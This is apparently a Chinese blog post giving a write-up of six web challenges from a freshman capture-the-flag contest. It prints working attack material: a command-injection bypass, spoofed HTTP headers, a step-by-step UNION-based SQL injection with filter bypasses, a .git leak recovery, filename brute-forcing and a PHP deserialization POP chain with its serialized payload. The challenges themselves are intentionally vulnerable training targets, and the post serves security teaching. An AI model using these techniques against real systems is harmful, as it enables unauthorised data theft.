<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Chive秋季新生赛web题解 | LiangMaxwell's Blog</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - 共 $1 行","copy":"复制","copyFinish":"复制成功","expand":"展开"}}</script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><meta name="generator" content="Hexo 6.3.0"></head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">About</span></a></li><li class="navItem"><a class="navBlock" href="/friends/"><span class="navItemTitle">Friends</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>Chive秋季新生赛web题解</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2021-10-14T14:39:49.000Z" id="date"> 2021-10-14</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2023-04-22T11:10:03.563Z" id="updated"> 2023-04-22</time></div></span><br><span>文章总字数: <div class="control">1.5k</div></span><br><span>预计阅读时间: <div class="control">7 分钟</div></span></div></div><hr><div id="post-content"><h1 id="WEB题解"><a href="#WEB题解" class="headerlink" title="WEB题解"></a>WEB题解</h1><h2 id="WEB签到"><a href="#WEB签到" class="headerlink" title="WEB签到"></a>WEB签到</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>@<span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><br><span class="hljs-variable">$a</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;a&#x27;</span>];<br><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$a</span>)!=<span class="hljs-number">3</span>||<span class="hljs-variable">$a</span>==<span class="hljs-string">&#x27;cat&#x27;</span>)&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;no way&quot;</span>);<br>&#125;<br><span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-variable">$cmd</span>=<span class="hljs-variable">$a</span>.<span class="hljs-string">&quot; ./flag.php&quot;</span>;<br>    <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-variable">$cmd</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>看代码可知，是一道简单的命令注入，命令不能是cat，长度还得是3，于是就可以使用命令tac来读取flag</p>
<p>GET传参 ,URl后面加上  &#x2F;?a&#x3D;tac   即可</p>
<h2 id="图灵测试"><a href="#图灵测试" class="headerlink" title="图灵测试"></a>图灵测试</h2><p>BurpSuite的简单应用</p>
<p>1.首先是GET传参    ?VaalaCat&#x3D;yyds 刷新</p>
<p>2.然后在Burp的请求拦截中，发送给Repeater，修改请求方法为POST 在最后加上 Niebelungen&#x3D;yyds，同时添加参数 Content-Type: application&#x2F;x-www-form-urlencoded</p>
<p>3.仍然在Repeater中，修改Cookie: name&#x3D;7att1ce</p>
<p>4.在User-Agent:下面添加一行 X-Forwarded-For:255.256.257.258</p>
<p>5.再在下面添加一行 Referer:<a target="_blank" rel="noopener" href="https://space.bilibili.com/199118139">https://space.bilibili.com/199118139</a></p>
<p>上述操作执行完之后就能过关，完整的HTTP请求头如图所示<br class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb1.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb1.png"></p>
<p>提示flag在fl4g1sH3r3.php中，访问这个地址，用burp拦截，发送给Repeater，在右边的HTTP相应中可以找到flag<br class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb2.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb2.png"></p>
<h2 id="Webmisc"><a href="#Webmisc" class="headerlink" title="Webmisc"></a>Webmisc</h2><p>直接dirsearch扫盘，发现隐藏的备份文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">python3 dirsearch.py -u http://0a1550e9-ca05-4563-be82-9ed6fbc59a83.node.vaala.ink/<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb3.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb3.png"></p>
<p>下载下来备份文件后，发现是个套娃压缩包，文件名作为解压密码，直接上脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> zipfile<br><span class="hljs-built_in">dir</span> = <span class="hljs-string">&quot;C:\\Users\\LiangMaxwell\\Downloads\\backup\\&quot;</span><br>n = <span class="hljs-number">0</span><br>s2 = <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">jieya</span>():<br>    i = <span class="hljs-string">&quot;22531.zip&quot;</span><br>    <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10000</span>):<br>        ss = i[:i.find(<span class="hljs-string">&quot;.&quot;</span>)]<br>        <span class="hljs-built_in">print</span>(i)<br>        password  = ss<br>        zpf = zipfile.ZipFile(<span class="hljs-built_in">dir</span> + ss + <span class="hljs-string">&quot;.zip&quot;</span>)<br>        <span class="hljs-built_in">list</span> = zpf.namelist()<br>        <span class="hljs-keyword">for</span> f <span class="hljs-keyword">in</span> <span class="hljs-built_in">list</span>:<br>            zpf.extract(f, <span class="hljs-built_in">dir</span>, password.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>))<br>        <span class="hljs-built_in">print</span>(ss + <span class="hljs-string">&quot; success &quot;</span> + <span class="hljs-built_in">str</span>(f))<br>        i = <span class="hljs-built_in">str</span>(f)<br>jieya()<br></code></pre></td></tr></table></figure>

<p>轻松得到flag</p>
<h2 id="华强买瓜"><a href="#华强买瓜" class="headerlink" title="华强买瓜"></a>华强买瓜</h2><p>首先还是dirsearch扫盘，发现&#x2F;.git&#x2F;泄露</p>
<p class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb4.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb4.png"></p>
<p>使用神器GitHack，将git文件下载下来</p>
<p class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb5.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb5.png"></p>
<p>然后在下载下来的文件夹中使用git，用<code>git log</code>查看历史版本</p>
<p class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb6.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb6.png"></p>
<p>利用<code>git reset --hard id</code>回到之前的版本</p>
<p>小知识，在git bash 中： <strong>复制：</strong> CTRL+INSERT <strong>粘贴：</strong> SHIFT+INSERT</p>
<p class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb7.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb7.png"><br>然后用Vi还原打开.hint.swp，可以看到提示，flag被藏到了一个图片里gua@@@@.png，其中@@@@是四个阿拉伯数字，直接上Burp进行爆破，可以在http相应中发现gua8848.png有长响应，访问即可看见flag</p>
<p class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/gua8848.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/gua8848.png"></p>
<h2 id="十月新番导视"><a href="#十月新番导视" class="headerlink" title="十月新番导视"></a>十月新番导视</h2><p>点进去看啥也没有，扫盘也扫不出来，查看源码时发现一个隐藏的地址</p>
<p class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb8.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb8.png"></p>
<p>访问之后如下图所示</p>
<p class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb9.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb9.png"></p>
<p>注意到有个<code>?id=</code>，可以看出来这个是一道SQL注入题，稍加测试就可以发现屏蔽了空格和一些关键词，但可以大小写绕过和注释绕过</p>
<p>payload如下所示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1/**/order/**/by/**/3<br>#3无结果，说明主select有两个变量<br>-1/**/Union/**/Select/**/1,/**/database()<br>#得到数据库为bangumi<br>-1/**/Union/**/Select/**/1,/**/Group_concat(table_name)/**/From/**/information_schema.tables/**/Where/**/table_schema/**/=/**/&#x27;bangumi&#x27;<br>#得到bangumi_secret,october两个表<br>-1/**/Union/**/Select/**/1,/**/Group_concat(column_name)/**/From/**/information_schema.columns/**/Where/**/table_name/**/=/**/&#x27;bangumi_secret&#x27;<br>#发现flag<br>-1/**/Union/**/Select/**/1,/**/flag/**/From/**/bangumi_secret<br>#读取到flag<br></code></pre></td></tr></table></figure>



<h2 id="Easy-UnSerialize"><a href="#Easy-UnSerialize" class="headerlink" title="Easy UnSerialize"></a>Easy UnSerialize</h2><h3 id="先看源代码"><a href="#先看源代码" class="headerlink" title="先看源代码"></a>先看源代码</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">Fifth Space &lt;?php<br>class Read &#123;<br>    public function read()&#123;<br>        echo file_get_contents(&quot;flag.php&quot;);<br>    &#125;<br>    public function __invoke()&#123;<br>        $this-&gt;read();<br>    &#125;<br>&#125;<br><br>class Show&#123;<br>    public $source;<br>    public $fuck;<br>    public $str;<br>    public function __construct($file=&#x27;index.php&#x27;)&#123;<br>        $this-&gt;source = $file;<br>        echo &#x27;Welcome to &#x27;.$this-&gt;source.&quot;&lt;br&gt;&quot;;<br>    &#125;<br>    public function __toString()&#123;<br>        return $this-&gt;str-&gt;source;<br>    &#125;<br><br>    public function __wakeup()&#123;<br>        if(preg_match(&quot;/gopher|http|file|ftp|https|dict|\.\./i&quot;, $this-&gt;source)) &#123;<br>            echo &quot;hacker&quot;;<br>            $this-&gt;source = &quot;index.php&quot;;<br>        &#125;<br>    &#125;<br>&#125;<br><br>class Test&#123;<br>    public $p;<br>    public function __construct()&#123;<br>        $this-&gt;p = array();<br>    &#125;<br><br>    public function __get($key)&#123;<br>        $function = $this-&gt;p;<br>        return $function();<br>    &#125;<br>&#125;<br><br>if(isset($_GET[&#x27;chain&#x27;]))&#123;<br>    @unserialize($_GET[&#x27;chain&#x27;]);<br>&#125;<br>else&#123;<br>    echo &quot;Fifth Space&quot;;<br>    highlight_file(__FILE__);<br>&#125;<br><br>?&gt;<br></code></pre></td></tr></table></figure>


<p>首先第一个Read类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">class Read &#123;<br>    public function read()&#123;<br>        echo file_get_contents(&quot;flag.php&quot;);<br>    &#125;<br>    public function __invoke()&#123;<br>        $this-&gt;read();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>


<p>可以读取flag，而且这里有魔法方法__invoke 当脚本尝试将对象调用为函数时会触发，所以在脚本中，我们要尽量把Read类调用为函数，来触发LFI</p>
<p>Show类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">class Show&#123;<br>    public $source;<br>    public $fuck;<br>    public $str;<br>    public function __construct($file=&#x27;index.php&#x27;)&#123;<br>        $this-&gt;source = $file;<br>        echo &#x27;Welcome to &#x27;.$this-&gt;source.&quot;&lt;br&gt;&quot;;<br>    &#125;<br>    public function __toString()&#123;<br>        return $this-&gt;str-&gt;source;<br>    &#125;<br><br>    public function __wakeup()&#123;<br>        if(preg_match(&quot;/gopher|http|file|ftp|https|dict|\.\./i&quot;, $this-&gt;source)) &#123;<br>            echo &quot;hacker&quot;;<br>            $this-&gt;source = &quot;index.php&quot;;<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>首先是wakeup当中禁用了一些协议，但是很明显没有禁用filter协议，之后看到这里有两个魔法方法：</p>
<p>_toString 把类当作字符串使用时触发,当然需要与echo方法进行配合使用</p>
<p> _wakeup 使用反序列化函数时触发</p>
<p>Test类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">class Test&#123;<br>    public $p;<br>    public function __construct()&#123;<br>        $this-&gt;p = array();<br>    &#125;<br><br>    public function __get($key)&#123;<br>        $function = $this-&gt;p;<br>        return $function();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>__get 从不可访问的属性中读取数据会触发会返回function作为函数调用。</p>
<h3 id="构造pop链"><a href="#构造pop链" class="headerlink" title="构造pop链"></a>构造pop链</h3><p>我们可以先使用反序列化触发Show类中的wakeup方法，之后想办法触发__tostring方法，之后将str实例化为Test，因为Test类中不含source属性，所以调用get方法，在这个时候我们便可以把 Read类当作函数调用，从而达到效果<br>之后便可运行以下php内容得到利用参数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><span class="hljs-keyword">class</span> Read &#123;    &#125;<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Show</span></span>&#123;    <span class="hljs-keyword">public</span> <span class="hljs-variable">$source</span>;    <span class="hljs-keyword">public</span> <span class="hljs-variable">$str</span>;	<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$file</span></span>)</span>&#123;    <span class="hljs-variable language_">$this</span>-&gt;source = <span class="hljs-variable">$file</span>;    &#125;    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span>&#123;        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;LiangMaxwell&quot;</span>;    &#125;&#125;<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Test</span></span>&#123;    <span class="hljs-keyword">public</span> <span class="hljs-variable">$p</span>;&#125;<span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Show</span>(<span class="hljs-string">&#x27;aaa&#x27;</span>);<span class="hljs-variable">$a</span>-&gt;str = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Test</span>();<span class="hljs-variable">$a</span>-&gt;str-&gt;p = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Read</span>();<span class="hljs-variable">$b</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Show</span>(<span class="hljs-variable">$a</span>);<span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$b</span>);<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">O:4:&quot;Show&quot;:2:&#123;s:6:&quot;source&quot;;O:4:&quot;Show&quot;:2:&#123;s:6:&quot;source&quot;;s:3:&quot;aaa&quot;;s:3:&quot;str&quot;;O:4:&quot;Test&quot;:1:&#123;s:1:&quot;p&quot;;O:4:&quot;Read&quot;:0:&#123;&#125;&#125;&#125;s:3:&quot;str&quot;;N;&#125;<br></code></pre></td></tr></table></figure>

<p>GET传参</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">chain=O:4:&quot;Show&quot;:2:&#123;s:6:&quot;source&quot;;O:4:&quot;Show&quot;:2:&#123;s:6:&quot;source&quot;;s:3:&quot;aaa&quot;;s:3:&quot;str&quot;;O:4:&quot;Test&quot;:1:&#123;s:1:&quot;p&quot;;O:4:&quot;Read&quot;:0:&#123;&#125;&#125;&#125;s:3:&quot;str&quot;;N;&#125;<br></code></pre></td></tr></table></figure>

<p>但是页面一片空白，这时候按下神奇的F12就能看到flag</p>
<p class='item-img' data-src='https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb10.png'><img src="https://liangmaxwell-blog.oss-cn-shanghai.aliyuncs.com/picture/img/chivewb10.png"></p>
<p>（我至少将这个正确的payload提交了20次，都没想到在F12中藏一个flag，烂完了）</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2021/10/28/xju1024ctf-zong-jie/">← Next XJU1024CTF总结</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2021/10/14/ru-he-pwn-diao-yi-ge-qia-xi-ou-ji-suan-qi/">如何PWN掉一个卡西欧计算器 Prev →</a></div></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="文章目录">≡</a><a id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">凉彧Maxwell</a></h1><div id="description"><p>凉彧のBlog</p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#WEB%E9%A2%98%E8%A7%A3"><span class="toc-number">1.</span> <span class="toc-text">WEB题解</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB%E7%AD%BE%E5%88%B0"><span class="toc-number">1.1.</span> <span class="toc-text">WEB签到</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%BE%E7%81%B5%E6%B5%8B%E8%AF%95"><span class="toc-number">1.2.</span> <span class="toc-text">图灵测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Webmisc"><span class="toc-number">1.3.</span> <span class="toc-text">Webmisc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%8E%E5%BC%BA%E4%B9%B0%E7%93%9C"><span class="toc-number">1.4.</span> <span class="toc-text">华强买瓜</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E6%9C%88%E6%96%B0%E7%95%AA%E5%AF%BC%E8%A7%86"><span class="toc-number">1.5.</span> <span class="toc-text">十月新番导视</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Easy-UnSerialize"><span class="toc-number">1.6.</span> <span class="toc-text">Easy UnSerialize</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%88%E7%9C%8B%E6%BA%90%E4%BB%A3%E7%A0%81"><span class="toc-number">1.6.1.</span> <span class="toc-text">先看源代码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%84%E9%80%A0pop%E9%93%BE"><span class="toc-number">1.6.2.</span> <span class="toc-text">构造pop链</span></a></li></ol></li></ol></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>